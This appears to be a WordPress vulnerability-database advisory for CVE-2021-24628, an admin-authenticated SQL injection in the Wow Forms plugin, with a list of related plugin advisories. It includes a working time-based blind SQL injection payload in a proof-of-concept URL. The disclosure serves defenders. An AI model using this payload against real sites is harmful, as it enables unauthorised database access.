Wow Forms <= 3.1.3 – Admin+ SQL Injection | CVE 2021-24628 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape a 'did' GET parameter before using it in a SQL statement, when deleting a form in the admin dashboard, leading to an authenticated SQL injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/mwp-forms/trunk/admin/partials/main.php#L13

As admin, https://example.com/wp-admin/admin.php?page=mwp-forms&info=del&did=1%20AND%20(SELECT%209063%20FROM%20(SELECT(SLEEP(5)))YGWC)

Affects Plugins

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-mwp-forms/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

d742ab35-4e2d-42a8-bebc-b953b2e10e3c

Timeline

Publicly Published

2021-10-07 (about 4 years ago)

Added

2021-10-07 (about 4 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2024-08-26

Title

Woocommerce Addon by Greenshift< 1.9.8 - Authenticated (Subscriber+) SQL Injection

Published

2025-09-16

Title

Quiz Maker < 6.7.0.57 - Unauthenticated SQL Injection

Published

2014-08-01

Title

UPM-POLLS 1.0.4 - BLIND SQL injection

Published

2025-03-24

Title

Shuffle <= 0.5 - Authenticated (Subscriber+) SQL Injection

Published

2021-11-22

Title

WP Visitor Statistics (Real Time Traffic) < 4.8 - Subscriber+ SQL Injection